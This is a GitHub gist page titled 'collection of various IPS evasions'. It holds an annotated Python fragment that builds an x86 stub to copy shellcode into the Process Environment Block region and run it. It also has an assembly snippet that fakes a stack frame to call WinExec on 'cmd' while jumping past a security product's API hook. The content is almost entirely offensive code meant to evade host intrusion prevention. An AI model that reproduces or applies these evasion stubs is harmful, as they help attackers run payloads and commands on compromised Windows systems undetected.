Created
April 18, 2010 16:20
-
-
Save gerry/666941d68230f4634a0b to your computer and use it in GitHub Desktop.
collection of various IPS evasions
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] | |
tls_header += "\xC3" # RETN | |
""" | |
another: | |
pop ebx ; Real return address | |
push 0x00220000 ; Address of push ebp/call ebp after a call. | |
push ebx ; Final return to the real return address | |
push 0xbadc0de2 ; Junk to align stack for pop ebp | |
push [ebp+0x4] ; Pointer to 'cmd\0' | |
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER | |
push ebp ; WinExec preable | |
mov ebp, esp | |
sub esp, 0x54 ; end WinExec preable | |
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6) | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment